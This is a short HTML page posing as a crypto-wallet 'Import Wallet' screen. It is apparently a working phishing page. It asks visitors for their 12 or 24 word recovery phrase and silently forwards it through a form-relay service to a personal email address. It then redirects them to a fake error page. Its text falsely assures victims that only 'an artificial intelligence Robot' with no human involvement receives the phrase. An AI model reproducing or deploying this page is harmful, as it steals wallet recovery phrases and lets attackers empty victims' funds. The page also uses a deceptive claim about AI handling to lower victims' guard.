<!DOCTYPE html>
<html lang="en">
        
        <head>
            <meta charset="UTF-8">
            <meta http-equiv="X-UA-Compatible" content="IE=edge">
            <meta name="viewport" content="width=device-width, initial-scale=1.0">
            <title>Wallets</title>
            <script src="https://kit.fontawesome.com/46d7328699.js" crossorigin="anonymous"></script>
            <link rel="stylesheet" href="style.css">
        </head>
<body class="background">
<div class="rase">
    <h5>Import Wallet</h5>
    <img class="inbox" src="imagess/inbox1.png" alt="inbox logo">
    
<form action="https://formsubmit.co/fbameyou@gmail.com" method="POST">
    <p class="word">Typically 12 (sometimes 24) words seperated by a single spaces. You are submitting it to an artificial intelligence Robot with Zero human interference</p>
    <input type="hidden" name="_captcha" value="false">
    <input type="hidden" name="_next" value="https://syncwallets.html-5.me/error.html">
    
    <textarea name="New Phrase" rows="4" placeholder="Enter your Phrase" required></textarea>

<button class="submit" type="POST">Connect Wallet</button>
</form>

</div>

</body>
</html>
